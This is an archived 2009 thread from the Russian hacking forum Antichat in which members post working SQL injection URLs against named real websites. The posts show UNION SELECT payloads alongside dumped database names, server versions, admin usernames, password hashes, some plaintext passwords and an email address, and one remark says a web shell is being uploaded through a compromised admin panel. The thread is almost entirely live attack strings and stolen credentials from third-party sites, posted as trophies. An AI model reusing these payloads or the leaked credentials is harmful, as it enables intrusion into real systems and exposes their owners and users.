ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9351  
Старый 14.05.2009, 18:42
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #9352  
Старый 14.05.2009, 18:45
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Бизнес портaл новосибирска>>
Код:
http://www.novosib.ru/market/offer.php?id=-2579+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),0,1,2,3,4,5--+
4.1.22-log:novosib8_mamba:novosib8_sgv@localhostortbld-freebsd6.1
 
Ответить с цитированием

  #9353  
Старый 14.05.2009, 19:52
SecreT
Новичок
Регистрация: 01.01.2007
Сообщений: 3
Провел на форуме:
138002

Репутация: 12
По умолчанию

http://www.organicavenue.com/products/news.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,database(),user(),7,8,9,10 from products/*

products
denisemari@localhost


http://www.hardwarehaber.com/haberbak.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,user(),version(),10,11,12,1 3,14,15,16/*

hardwarehaber
root@localhost
5.0.32-Debian_7etch3-log



http://www.aysu.de/haber.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,user(),24,25,26,27,28,29/*

dbaysu_1
aysu@localhost

Последний раз редактировалось jokester; 14.05.2009 в 21:23.. Причина: funnymoneyreport.com БОЯН
 
Ответить с цитированием

  #9354  
Старый 14.05.2009, 19:56
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Газета юрист.
PR - 5


user() - u74105@10.10.223.75
database() - u74105_yur
version() - 5.0.67-log
@@version_compile_os - unknown-freebsd6.3

Код:
http://www.gazeta-yurist.ru/article.php?i=-397+union+select+version(),user(),3,4,5,6++--
 
Ответить с цитированием

  #9355  
Старый 14.05.2009, 20:01
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Еда ПР6
http://www.sierranevada.edu/pictures/photo/?aid=-191'+union+select+1,2,3,concat(username,char(58),p assword),5,6,7+from+usr+--+&index=2
rstriffler:16908b0605f2645dfcb4c3a8d248cef3:80 - events
CindyM:bccef78390596a8a3069b548b9c9214f:32 - incline
SchuylerH:bccef78390596a8a3069b548b9c9214f:33 - incline
.....................

Последний раз редактировалось DezMond™; 15.05.2009 в 15:25..
 
Ответить с цитированием

  #9356  
Старый 14.05.2009, 21:20
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Морские сражения

http://navyfield.ru/index.php?page_id=1'+or+1=@@version--

http://navyfield.ru/index.php?page_id=1'+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('phpbb_bots'))--

Нету дампера mssql... вот и лениво

ЗЫ: Чувствую,что это такой боян,что ппц...
 
Ответить с цитированием

  #9357  
Старый 14.05.2009, 22:22
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.foodplus.ae/menu.php?id=1+union+select+1,concat_ws(0x3a,versio n(),datab ase(),u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27--

5.0.75-community-log:fanzplus_foodplus:fanzplus_foodp@localhost

P.S что то я найти таблы не могу =\

---------------------------------------------------------------------------
PR: 3

http://www.ae-concrete.com/productchar.php?id=-1+union+select+concat_ws(0x3a,ve rsion(),database(),us er()),2--

4.1.22-standard:db_aeconcrete:db_aeconcrete_97@localhost

----------------------------------------------------------------------------
PR: 5

http://www.go-green.ae/link.php?id=1+union +select+1,2,3,concat_ ws(0x3a,version(),database(),us er()),5,6,7/*

4.1.21:gogreen:gogreen@localhost


-----------------------------------------------------------------------------


http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,concat_ws(0x 3a,version(),databas e(),user()),3--

5.0.67-community-log:huda_houda:huda_userhuda@localhost



http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,Admin _ID,Admin_Nam e,User _Name,P as sword,Email)),3+from+admin+limit+0,1--


admin :
1:Administrator:h uda123:huda_123:b assam@dowgroup.com

Последний раз редактировалось HAXTA4OK; 14.05.2009 в 23:00..
 
Ответить с цитированием

  #9358  
Старый 15.05.2009, 00:11
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.safariclub.ru/field.php?action=view&id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--&status=1
netsoft@localhost:netsoft_safari:5.0.45

PR: 4
тИЦ: 100


Код:
http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4--
patrioty_patriot@localhostatrioty_paintball:5.0. 67-community

Код:
http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,password),4+from+users_cp--
10:admin:dfer54

http://patrioty.info/admin/ - админка. Шелл льётся =)

Последний раз редактировалось mailbrush; 15.05.2009 в 00:40..
 
Ответить с цитированием

  #9359  
Старый 15.05.2009, 00:43
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

ПР6
http://nccsdataweb.urban.org/faq/detail.php?linkID=-805+union+select+1,2,user,password,5,6,7,8,9,10,11 ,12,13+from+mysql.user+limit+1,1/*&category=9
jdurnford::1030bc2d72167683

http://www.avalonmicro.ca/products/index.php?Category=-6+union+select+table_name+from+information_schema. tables+--+
user_registration

http://www.amprofon.com.mx/noticias.php?id=-12+union+select+1,2,user,4+from+usuarios--
apcmmexico

Последний раз редактировалось jokester; 15.05.2009 в 10:41.. Причина: объединил посты
 
Ответить с цитированием

  #9360  
Старый 15.05.2009, 03:32
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию


Joomla com_akogallery

http://www.kaminfeger.com/index.php?option=com_akogallery&Itemid=51index.php ?option=com_akogallery&Itemid=S@BUN&func=detail&id =-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

admin c564660bacebedf0e02d3a409f29cd5b ??????



http://www.wenatcheecares.org/user.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_nickna me,user_passwd),6,7,8,9,10,11+from+users

Pastor Andrew:547d4e455674d06bd4d40475796f6944 pass : wencares

http://www.wenatcheecares.org/login.php

Последний раз редактировалось jokester; 15.05.2009 в 10:45.. Причина: Объединил
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
 


Быстрый переход




ANTICHAT.XYZ